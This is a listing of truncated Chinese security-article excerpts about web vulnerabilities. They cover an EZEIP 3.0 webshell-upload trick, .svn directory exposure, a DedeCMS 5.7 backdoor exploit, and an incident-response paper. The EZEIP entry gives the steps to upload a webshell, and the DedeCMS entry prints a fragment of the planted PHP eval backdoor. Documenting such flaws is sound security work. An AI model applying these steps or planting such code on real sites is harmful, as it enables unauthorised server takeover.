-
EZEIP3.0 getwebshell 漏洞
先修改IE浏览器的安全设置,调制最高,然而禁止js执行。 然后打开修改上传类型页面,添加aspx类型,点击保存,再打开上传页面上传,上传后,马儿就乖乖待在那了! 修改上传类型页面:http://www.iick.blog/whir_syst...
-
.svn目录未设权限限制的漏洞利用总结(含修复方案)
有的站点使用.svn来做生产环境版本控制,但是.svn目录没有做访问权限限制,可以通过.svn/entries来遍历文件和目录列表。 为了节约体力,我写了一个php脚本(http://rains.im/?q=node/18)来做这件事,如果...
-
dedecms 5.7 一句话后门利用 exp
author:舞林tx微博:http://t.qq.com/wulinlw晚上看到这个http://www.wooyun.org/bug.php?action=view&id=5416shopcar.class.php 被植入一句话...
-
Dedecms源码或遭入侵被植入一句话后门
DedeCMS V5.7 SP1正式版 UTF-8 GBK版本疑似被植入一句话后门 前几日下载并不存在此代码 详细说明:shopcar.class.php被植入一句话@eval(file_get_contents('php://input'...
-
企业安全应急响应与渗透反击 v0.04(程冲)
文档:企业安全应急响应与渗透反击 v0.04程冲,2012年02月。简介:2011年6月份我入职某企业安全部门来,截至到目前为止(已知)发生了5次安全事件。每一次都暴露出互联网企业在安全工作中普遍比较容易被忽略或者遗漏的威胁和弱点。近期我对...
